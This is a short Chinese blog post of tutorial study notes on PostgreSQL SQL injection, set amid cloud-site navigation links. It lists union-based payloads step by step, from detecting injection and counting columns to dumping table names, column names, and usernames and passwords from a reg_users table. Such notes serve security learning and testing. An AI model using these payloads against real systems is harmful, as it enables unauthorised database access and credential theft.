某教程学习笔记（一）：11、postgreasql数据库注入-天翼云

某教程学习笔记（一）：11、postgreasql数据库注入

2023-06-12 09:34:28 阅读次数：86

有时候很想跟她道个歉，遇见她的时候我太小了，是我不注重细节，毁了她好多温柔，是我不会爱人，抱歉。。。

---- 网易云热评

一、判断是否存在注入

and 1=2 返回错误

and 1=1 返回正常，存在注入

and 1::int=1 返回正常说明是postgresql数据库

二、判断字段数量

order by 5 返回错误

某教程学习笔记（一）：11、postgreasql数据库注入

order by 4 返回正常说明，有四列

某教程学习笔记（一）：11、postgreasql数据库注入

三、联合查询

union select '1','2','3','4' 可以看出2/3号位置显示

某教程学习笔记（一）：11、postgreasql数据库注入

四、获取当前数据库

union select '1',current_database(),'3','4'

某教程学习笔记（一）：11、postgreasql数据库注入

五、获取第一个表

union select '1',relname,'3','4' from pg_stat_user_tables limit 1 offset 0

某教程学习笔记（一）：11、postgreasql数据库注入

获取第二个表

union select '1',relname,relname,'4' from pg_stat_user_tables limit 1 offset 1

六、获取第一个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0

某教程学习笔记（一）：11、postgreasql数据库注入

获取第二个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1

七、获取字段内容

union select '1',''||name||','||password||'','3','4' from reg_users

某教程学习笔记（一）：11、postgreasql数据库注入

活动

应用商城

合作伙伴

开发者

支持与服务

了解天翼云

某教程学习笔记（一）：11、postgreasql数据库注入

某教程学习笔记（一）：11、postgreasql数据库注入

相关文章

Java后端数据库迁移策略：Flyway与Liquibase

啥是数据库范式

Java后端微服务架构下的数据库设计：Sharding与CQRS

MySQL数据库10——多表连接查询

MySQL数据库12——视图（VIEW）

MySQL数据库11——子查询语句

MySQL数据库05——数据的查询（SELECT）

MySQL数据库04——索引

MySQL数据库08——函数使用

基于SpringBoot+Vue的成都锦城学院校内订餐系统的详细设计和实现(源码+lw+部署文档+讲解等)

作者介绍

最新文章

啥是数据库范式

MySQL数据库10——多表连接查询

MySQL数据库12——视图（VIEW）

MySQL数据库11——子查询语句

MySQL数据库04——索引

MySQL数据库08——函数使用

热门文章

Nacos数据持久化到MySQL

MySQL的间隙锁

​云原生微服务K8s容器编排第七章之ETCD的使用及备份

oracle 数据库 中 如何将不带汉字的日期格式转换成带“年月日时分秒”格式的日期

【Error】kettle连接MySQL

JSP之 MySQL 插入数据时，中文乱码问题的解决

热门标签

相关产品

弹性云主机

天翼云电脑（公众版）

对象存储

云硬盘

随机文章

Linux MySQL数据库的备份

使用QT操作sqlite（1）--QT数据库连接

SQLite学习笔记（一）

MySQL权限管理实战

在Linux中执行mysqladmin命令修改密码报错“mysqladmin: connect to server at ‘localhost‘ failed“

主流数据库对比：MySQL、PostgreSQL、Oracle和Redis的优缺点分析

云原生微服务K8s容器编排第七章之ETCD的使用及备份

oracle 数据库中如何将不带汉字的日期格式转换成带“年月日时分秒”格式的日期